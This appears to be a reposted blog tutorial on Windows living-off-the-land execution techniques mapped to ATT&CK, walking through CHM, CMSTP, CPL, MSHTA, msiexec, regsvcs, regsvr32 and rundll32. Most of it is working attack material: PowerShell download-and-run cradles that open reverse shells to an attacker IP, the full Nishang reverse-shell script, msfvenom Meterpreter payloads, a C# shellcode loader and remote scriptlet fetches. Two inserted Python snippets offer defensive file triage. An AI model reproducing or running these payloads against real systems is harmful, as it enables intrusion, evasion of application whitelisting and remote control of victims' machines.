
ATT&CK Command Execution: Remote Dynamic Data Exchange

2021-03-06 21:32:01  Reads: 1644  Source: Internet






Introduction to Empire


Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture.

Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

git clone https://github.com/EmpireProject/Empire.git

cd Empire/setup

./install.sh

./empire

Environment

Attack machine: Kali 192.168.243.133

Victim machine: Win7 x64 192.168.243.154

  • Set up a listener

  • Start the listener

  • Generate the stager (the "trojan")

Run the generated file /tmp/launcher.bat on the victim machine (Win7 x64).

  • Enter agents to view the agent that called back

 

Command-line interface

C:\Users\root\Desktop>PowerShell IEX (New-Object Net.WebClient).DownloadString('VPS/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666

On the attack machine, listen with:

nc -lvp 666

 

Local: Signed Script Proxy Execution

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

pubprn.vbs method: write the following 1.sct file into the root directory of the remote web server:

root@kali:~# cat 123.sct 
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true" >
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>


Wscript method

Start Empire and generate a VBS script.

Set the listener address information.

Type "execute" to run it and generate the VBS code; use agents to list the agents.

Alternatively:

C:\Users\root\Desktop>wscript launcher.vbs

Each execution produces one call-back; this obtains an agent on the target.

Get a shell

agents

(Empire: agents) > interact RWACGHYM
(Empire: RWACGHYM) > shell ipconfig
 

chm

Introduction

The CHM file format is an HTML-based help-file system that Microsoft introduced in 1998 to replace the earlier WinHelp system. Windows 98 called CHM files "Compiled HTML Help files". Everything Internet Explorer supports (JavaScript, VBScript, ActiveX, Java applets, Flash, common image formats such as GIF, JPEG and PNG, and audio/video files such as MID, WAV and AVI) is also supported by CHM, and a CHM file can link out to the Internet through URLs.

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Create the malicious CHM file

SIP.html

<html>
<body>
<h1>blue team</h1>
Security
</body>
</html>

STA.html

<html>
<body>
<h1>blue team</h1>
Network
</body>
</html>

Index.html

<!DOCTYPE html><html><head><title>Mousejack replay</title></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('192.168.243.134/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
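Static triage for the two file types above, the 1.sct scriptlet and the CHM Index.html that carries the HTML Help shortcut control. This is an added example, not code from the original post: the inputs are constructed copies of the page's files with a placeholder download URL, and the finding names are assumed labels.

```python
import re
import xml.etree.ElementTree as ET

# CLSID of the HTML Help "Shortcut" ActiveX control used by the page's Index.html.
HH_SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
WSH_RUN = re.compile(r'ActiveXObject\(\s*["\']WScript\.Shell["\']\s*\)\s*\.Run\s*\(', re.I)
OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(r"<param\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def triage_sct(text):
    """Findings for a COM scriptlet such as the 1.sct shown above."""
    findings = []
    # scrobj.dll accepts '<?XML ...?>' but expat rejects the uppercase PI target,
    # so a strict XML scanner that does not normalise it silently skips such files.
    if text.lstrip().startswith("<?XML"):
        findings.append("uppercase <?XML?> declaration")
        text = re.sub(r"^\s*<\?XML", "<?xml", text)
    root = ET.fromstring(text)
    if root.tag.lower() != "scriptlet":
        return findings
    reg = root.find("registration")
    if reg is not None and reg.get("remotable", "").lower() == "true":
        findings.append("registration remotable=true")
    for script in root.findall("script"):
        if WSH_RUN.search(script.text or ""):
            findings.append("script spawns a process via WScript.Shell.Run")
    return findings

def _attrs(tag_body):
    """Attribute dict for one tag body; handles double-, single-quoted and bare values."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag_body)}

def triage_html(text):
    """What an HH shortcut OBJECT (as in Index.html) would launch, or None."""
    for m in OBJECT_RE.finditer(text):
        clsid = _attrs(m.group(1)).get("classid", "").lower().replace("clsid:", "")
        params = {}
        for pm in PARAM_RE.finditer(m.group(2)):
            a = _attrs(pm.group(1))
            params[a.get("name", "")] = a.get("value", "")
        if clsid == HH_SHORTCUT_CLSID and params.get("Command", "").lower() == "shortcut":
            # Item1 is ",<program>,<arguments>": the program sits after the first comma.
            fields = params.get("Item1", "").split(",", 2) + ["", ""]
            return {"program": fields[1].strip(), "args": fields[2].strip(),
                    "auto_click": re.search(r"\.Click\s*\(", text) is not None}
    return None

# Constructed samples modelled on the page's 1.sct and Index.html; the download
# URL is a placeholder, not the lab address.
SAMPLE_SCT = """<?XML version="1.0"?>
<scriptlet>
<registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" remotable="true">
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>"""

SAMPLE_HTML = """<html><head><title>Mousejack replay</title></head><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
</body></html>"""
```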

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 

function Invoke-PowerShellTcp 
{ 
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
the given IP and port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. 

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port. 

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>      
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

 

CMSTP

Introduction

CMSTP is the binary associated with the Microsoft Connection Manager Profile Installer. It accepts INF files, which can be weaponized with malicious commands to execute arbitrary code in the form of scriptlets (SCT) and DLLs. It is a trusted Microsoft binary located in the following two Windows directories.

Execution through cmstp.exe calls a malicious DLL or COM scriptlet (SCT). This method can bypass AppLocker or other application-whitelisting defenses as well as UAC.

C:\Windows\System32\cmstp.exe

C:\Windows\SysWOW64\cmstp.exe

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

1. Generate a malicious DLL (pentestlab.dll) with msfvenom from the Metasploit Framework.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.243.133 LPORT=3333 -f dll > /root/Desktop/pentestlab.dll

The INF file is shown below; its RegisterOCXSection must contain the local path of the malicious DLL, or a WebDAV location for remote execution.

cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

2. The RegisterOCXSection of the INF file must contain the local path of the malicious DLL, or a WebDAV location for remote execution.

[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll

3. The Metasploit multi/handler module must be configured to receive the connection.

4. When the malicious INF file is passed to cmstp, the code executes in the background.

cmstp.exe /s cmstp.inf

5. A Meterpreter session is obtained.

Local: CPL

Introduction

A CPL file is a Windows Control Panel extension item (CPL stands for Control Panel Item). The system32 directory under the Windows installation directory holds a series of .cpl files, each corresponding to an item in the Control Panel.
A CPL file is essentially a Windows executable, but not one that can run on its own; it is normally opened through shell32.dll.

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

The first step is to create a DLL and rename it to .cpl so that it can be executed through the Control Panel. Metasploit's msfvenom can create a custom DLL that embeds a Meterpreter payload, or Didier Stevens's cmd DLL can be used to bypass restrictions that prohibit running cmd.

1. Generate the payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.243.133 lport=3333 -f dll -o pentestlab.cpl

2. Set up the listener in msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.243.133

set LPORT 3333

exploit -j

3. The following command creates a registry value whose data is the path of the CPL file stored on the host. By default, standard users have write access to their own hive.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v pentestlab.cpl /t REG_SZ /d "C:\cpl\pentestlab.cpl"

4. Open the Control Panel to execute the payload, or run control pentestlab.cpl, and a Meterpreter session is obtained.

A session is obtained successfully.

 

Local: Forfiles

Introduction

forfiles is a batch-deletion command built into Windows. Its time checks are based on each file's own modification-date attribute, which makes it a good choice for finding and deleting old files.

The forfiles command searches for specified files or folders across drives and is convenient for updating software or running batch programs. Its syntax is: forfiles /p <folder or drive to search> /m <file type to search for> /s (search subdirectories recursively) /c <command to execute>

Detailed reference: https://www.jb51.net/softs/498793.html

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

1. forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

Local: IEExec

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe http://192.168.243.133/evil.exe

 

InfDefaultInstall

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

InfDefaultInstall.exe shady.inf

shady.inf:

[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct
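Parsing the install directives of cmstp.inf (CMSTP section above) and shady.inf (this section) to see what code each INF would make setupapi load, and from where. Added example, not the post's own tooling: CMSTP_INF is the page's file, SHADY_INF uses a placeholder URL in place of the gist, and the finding wording is assumed.

```python
import re

# Directives in a [DefaultInstall*] section that make setupapi load a DLL.
LOADING_DIRECTIVES = ("RegisterOCXs", "RegisterDlls", "UnregisterDlls")
TRUSTED_PREFIXES = ("%systemroot%", "%windir%", "c:\\windows\\")

def parse_inf(text):
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop ';' comments and blanks
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

def _describe(directive, entry):
    if directive == "RegisterOCXs":
        # Each line is a DLL path, optionally followed by ",flags".
        path = entry.split(",", 1)[0].strip().strip('"')
        low = path.lower()
        if low.startswith("\\\\") or low.startswith(("http://", "https://")):
            origin = "remote (UNC/WebDAV or URL)"
        else:
            origin = "inside" if low.startswith(TRUSTED_PREFIXES) else "outside"
            origin += " the Windows directory"
        return f"{directive} loads {path}: {origin}"
    # RegisterDlls/UnregisterDlls entry: dirid,subdir,filename,flags,timeout,args
    # (flag 2 is FLG_REGSVR_DLLINSTALL: args are handed to the DLL's DllInstall).
    parts = [p.strip() for p in entry.split(",", 5)] + [""] * 6
    filename, flags, args = parts[2], parts[3] or "0", parts[5]
    note = f"{directive} calls {filename} (dirid {parts[0]}, flags {flags})"
    if filename.lower() == "scrobj.dll" and re.match(r"https?://", args, re.I):
        return note + f": scrobj.dll handed a remote scriptlet URL {args}"
    return note + (f" with argument {args}" if args else "")

def triage_inf(text):
    """Findings for every code-loading directive reachable from an install section."""
    sections, findings = parse_inf(text), []
    for name, lines in sections.items():
        if "install" not in name.lower():
            continue
        for line in lines:
            key, _, value = (s.strip() for s in line.partition("="))
            if key in LOADING_DIRECTIVES:
                for target in (t.strip() for t in value.split(",")):
                    findings.extend(_describe(key, e) for e in sections.get(target, []))
    return findings

# Constructed inputs: the page's cmstp.inf, and shady.inf with a placeholder URL.
CMSTP_INF = r"""[version]
Signature=$chicago$
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
"""

SHADY_INF = r"""[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://placeholder.invalid/Backdoor-Minimalist.sct
"""
```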

InstallUtil

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Tool: https://github.com/khr0x40sh/WhiteListEvasion.git

Example

Generate the payload (sc):

python InstallUtil.py --csfile temp.cs --exefile temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.243.133 --lport 443

Practical demonstration

Build the binary:

.\csc.exe pentestlab.cs

Execute the binary:

.\InstallUtil.exe /logfile= /logtoconsole=false /u pentestlab.exe

Set up msf.

A session is obtained successfully.

Get a shell.

 

MSHTA

Introduction

mshta.exe is a program that ships with Microsoft Windows. Its full name is Microsoft HTML Application, and it is used to execute .HTA files.

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Attack method:

1. After starting the Empire framework on Kali, enter:

listeners
uselistener http
set Host http://192.168.243.133
set Port 8080
execute

Output:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://192.168.243.133
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name mshta
(Empire: listeners/http) > execute
[*] Starting listener 'mshta'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > listeners
[*] Active listeners:

  Name     Module   Host                          Delay/Jitter   KillDate
  ----     ------   ----                          ------------   --------
  mshta    http     http://192.168.243.133:8080   5/0.0

(Empire: listeners) >

Generate the .hta file with Empire

usestager windows/hta

set Listener http

set OutFile /root/Desktop/1.hta

execute

Start a web server with Python.

The victim machine executes:

cd /root/Desktop/
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

On Win7, execute:

mshta.exe http://10.100.19.19:80/1.hta

[The port the payload listens on and the port used for the download must not be the same.]

Empire receives the victim's shell successfully.

 

MSIexec

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

1. Generate the payload with msfvenom:

msfvenom -a x86 -f msi -p windows/exec CMD=calc.exe -o calc.png

2. Set up a simple web server:

python -m SimpleHTTPServer 80

3. On the local computer, fetch and run the payload with msiexec:

msiexec /q /i http://192.168.243.133/calc.png

 

Pcalua

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

C:\windows\system32\pcalua.exe -a C:\file.lnk

C:\windows\system32\pcalua.exe -a notepad.exe

C:\windows\system32\pcalua.exe -a \\server\payload.dll (runs a payload from a remote host locally)

 

Regsvcs/Regasm (.NET Services Installation Tool / Assembly Registration Tool)

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

1. Use PowerShell to produce key.snk

PS D:\> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='

PS D:\> $Content = [System.Convert]::FromBase64String($key)

PS D:\> Set-Content key.snk -Value $Content -Encoding Byte

2. Generate C# shellcode with msfvenom and copy the shellcode into a file named regsvcs.cs

msfvenom -a x86 -platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4444 -f csharp


regsvcs.cs:

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

Create Your Strong Name Key -> key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll //Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll //This calls the UnregisterClass Method
*/

namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComRegisterFunction] //This executes if registration is successful
        public static void RegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute");
            Shellcode.Exec();
        }

        [ComUnregisterFunction] //This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute either.");
            Shellcode.Exec();
        }
    }

    public class Shellcode
    {
        public static void Exec()
        {
            // native function's compiled code
            // generated with metasploit: the reverse_tcp stager produced in step 2
            byte[] shellcode = new byte[341] {
                0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
                0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
                0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
                0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
                0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
                0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
                0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
                0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
                0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
                0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
                0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,
                0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x64,0x13,0x13,
                0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,
                0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,
                0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,
                0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,
                0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,
                0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,
                0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,
                0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
                0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,
                0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,
                0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5
            };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data
            IntPtr pinfo = IntPtr.Zero;
            // execute native code
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    }
}

3. msf setup

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.243.133

set LPORT 4444

exploit -j

4. The Microsoft .NET Framework includes a Visual C# compiler that can be run from cmd and can produce the malicious DLL; the key.snk file is used to sign the generated DLL.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs

5. Execute: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll

A Meterpreter session is obtained.

 

regsvr32

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Tool: https://github.com/Hood3dRob1n/JSRat-Py.git

1. Run JSRat.py on Kali:

python JSRat.py -i 192.168.243.133 -p 3333

2. Execute the command on the victim machine:

regsvr32.exe /u /n /s /i:http://192.168.243.133:3333/file.sct scrobj.dll

3. Kali receives the victim's shell.

 

Rundll32

Environment

Attack machine: Kali (192.168.243.133)

Victim machine: Win7 x64 (192.168.243.154)

Process

rundll32 AllTheThings.dll,EntryPoint

rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://reverse-tcp.xyz/payload.sct");window.close();

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.100.18.20 -Port 3333;"

